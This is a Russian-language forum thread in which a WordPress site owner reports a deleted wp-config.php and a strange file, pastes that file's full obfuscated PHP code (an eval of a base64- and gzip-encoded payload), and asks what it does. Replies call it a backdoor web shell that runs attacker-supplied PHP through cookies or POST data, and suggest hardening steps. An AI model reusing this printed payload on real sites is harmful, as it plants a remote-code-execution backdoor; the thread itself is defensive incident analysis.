• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

Взломали ли сайт?

B

bug0

Всем доброго времени суток!
Дело было так: Есть свой сайт на Wordpress, не заходил в админку три дня, сегодня перешел на сайт, а он лежит, просит заново установить Wordpress, заметил что удален файл - wp-config.php, а еще появился в корне сайта любопытный файл: 6fed6p3chn.php

Код файла выглядит так:
<?php


eval("\n\$dgreusdi = intval(__LINE__) * 337;");

$a = "7VdrT+NGFP1eqf9hiCIcKwHFj7ClIQh2Bd1V6bIthVZC1Jo4k2QSvzR2674raF/94zDk78GLOou5W6Uo2M7Zlzz33MnTs3JzzgTsySlsa674CIXjhROtQ95fX1zo/W+/IbhONgjMOSkqBqRbnffpvcPumbtIeBg4CfdZAQdMOuh43OdJK52Qf3KySaNIh674vqxWRAzvFg/WxqHApG3SlpNZ03l5c/vjsjNCZNNwznnDlhwAbH2UeyCvW1zF/rR4U5h9zwpyCfBnTChMODJU+otD+HhpIiOk8pmB8u4RNL674iZazpDG7MB2RswNR6y1ReodlZIsNvLavv674xyUtuJ3JuyWuIwMxzDI/r18dN5BaBm7rCfcnFHJ8ltFUNkWDJQgSkZHvj+vSnn2+M8OJs8vri+jR+e2YYV7+vTj9cee9vbk57b65XZxfXhvHDL97k9W/n7942Mm+qBsAZFoycOB6748mMSpc/hGSNYjtSY9AckfGbKsQYZqpxKrHF674uez5cXv36lDsByIaLROaOYDGjwp3Wh7mYQRm+XwSVROryKVNcyKd/L6eqltXmlsJxeZVzLI2+mr42/Xw6Z068GPo8jvHdakYsjDzWkQHxPDoMBU2YYuciXGMu/LVvDHFpNApxw9rCGT7o9kmTHyFBPLYh1/v1C7qWm6Vys41c3hayu6uiBLzdhtm83f505JrsPmGBdNiJqKA+7A/FKCO7bfI7HXmdDuVU3zZnd3olO9ThKI/s6743cqWmW95Xx4LKxYdcsVSZUbDuuIer9No1uNzjW48/BAdlqlvV6sPR2ijcZLymcRG9MZW0XjGT2cz674aTWcgmfDaK4nA0GzNN18lgQCoanq/up0LQj61cFZIPhrOkIhaveJIWhbwC8JeW0cXGIw3e+F6xGlQqqyitQm61aKndAXgSTaMl674+kOeA4er+Gasd/dMzQFkLnTUJ6mglOP/ykLghRUUao279onpvKJIRCFkIy0u5fQ5jKK3eNk3+ZvtRYUS1tzRBOKDTVnH2vPgJNFsPU1dgVjQaGY5CgKB1BFtUIW7w46745UG674N5miihTDFNajUsQ2sl8o4fuKzahSmje29sAtnxk8iBaJwrfhYjxmIiutm+Fk6G1Su7j+e0bnc+//AOGBWfq2OqSHsZ582iXCXg+DB7hf4f4O9y674674urg/oQQQ/DdLbNBggwPiHQJC8IHOkFiADdhgAG674AYgBjAGQAZQBmHJaYTAiZUgO674TAiZ674DJ79faYIDNBZoLMhFKrWzYNIAtkFsgskFkgsyBkQciCkAUhG0pt4GzgbOkLcDZwNnD2qxKhDS674bQj0I9b7aZPmf8Ksj1FV9Iipa2imSI5I1duuy2Cd6pecfpmhF74zSeJs2bals2sbdkZ2BVKrsAiVRjdQu6d6fn+vk6AgbvL5Lk5fsYpT0a674UVJ7T8ocGDBauSltwMFn6do5y0iVGJVdoZV7xpGy+IAv49kJYiFmvpfDRMZYM674YyveVlza2G6+1Hbzs2w3S7YffAHTrZeabr3Y9DrhJ8v/sc2rKfcY6GUiHZOu2gw33QPDJ2VdXDo5PsbpplL71JLsD9IfM67StC674iPSDlPZNZvbf3/GaSMR4QW93BZj+D1mZkDdbf";
$a = str_replace($dgreusdi, "E", $a);

eval (gzinflate(base64_decode($a)));



Начал в cPanel рыть логи, увидел что вчера вечером кто-то заходил на сайт и юзал именно этот файл.
Еще были обращения к /xmlrpc.php
Что это может быть, ваши предположения? Что делает этот код?
Что может дать атакующему, выполнение данного скрипта?
 

z3r0c10wn

Grey Team
04.09.2017
229
295
BIT
209
1) Обращения к xmlrpc -скорее всего брут.
2) Код - даю 99% бэкдор.

Ты сам обратись к файлику в браузере, скорее всего увидишь запрос на авторизацию. К гадалке не ходи шелл. Если нид доп консультация - в личку
 
  • Нравится
Реакции: bug0 и Vertigo

Vertigo

Lex mea est Vulgate Linux
Gold Team
15.02.2017
1 318
3 999
BIT
3
Вы сами ответили на свой вопрос неоднократно.Посторонняя активность уже как факт говорит о том,что сайт подвергся успешной атаке и вмешельству (если удалён какой-либо из файлов+изменения на ресурсе с фиксацией активности )
Ребята ,вы чего? (обращаюсь к ТС) -xmlrpc.php всегда был инструментом для удалённого обращения к сайту Wordpress.
Это же классика и этот файл стараются отключить нахрен от греха подальше.
С мобильного устройства возможно использовать удалённый доступ ,предоставляемый xmlrpc.php. !!
С 2008 года ,начиная с версии 2.6 WordPress появилась функция отключения этого файла.Если это не iPhone (для него по-умолчанию такая функция включена )
 

Night Hunter

Green Team
13.01.2018
284
284
BIT
0
100% взлом. Советую частенько сканировать сайт на дыры, следить за правами на файлы и директории + использовать плагины для защиты.
Я использую iThemes Security и Wordfence Security. Если всё настроено правильно, то будет отлично. Пока вроде из всех сайтов, на которых использовал эти плагины - их ни разу не взломали.
P.S. WP требует к себе постоянного внимания.
 
Последнее редактирование:
  • Нравится
Реакции: bug0 и Vertigo

z3r0c10wn

Grey Team
04.09.2017
229
295
BIT
209
Вы сами ответили на свой вопрос неоднократно.Посторонняя активность уже как факт говорит о том,что сайт подвергся успешной атаке и вмешельству (если удалён какой-либо из файлов+изменения на ресурсе с фиксацией активности )
Ребята ,вы чего? (обращаюсь к ТС) -xmlrpc.php всегда был инструментом для удалённого обращения к сайту Wordpress.
Это же классика и этот файл стараются отключить нахрен от греха подальше.
С мобильного устройства возможно использовать удалённый доступ ,предоставляемый xmlrpc.php. !!
С 2008 года ,начиная с версии 2.6 WordPress появилась функция отключения этого файла.Если это не iPhone (для него по-умолчанию такая функция включена )
Не поверишь, однажды нашел на проекте клиента(мелкий аудит делал), такой же шелл. Оказалось никакого взлома не было - один из разрабов юзал его как RAT в своих целях! Ржали всем отделом.
 
  • Нравится
Реакции: g00db0y и Vertigo

Night Hunter

Green Team
13.01.2018
284
284
BIT
0
Не поверишь, однажды нашел на проекте клиента(мелкий аудит делал), такой же шелл. Оказалось никакого взлома не было - один из разрабов юзал его как RAT в своих целях! Ржали всем отделом.
Не в данном случае...важные файлы были удалены и ещё закинута фигня непонятная)
 

Citizen0

Green Team
07.02.2017
203
228
BIT
0
заметил что удален файл - wp-config.php

Что делает этот код?
Что может дать атакующему, выполнение данного скрипта?
Проверяются куки или post-данные на наличие определенных данных, и в зависимости от содержимого этих данных злоумышленник может получить информацию о версии php и версии шелла, либо выполнить php-код.
 
  • Нравится
Реакции: bug0
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!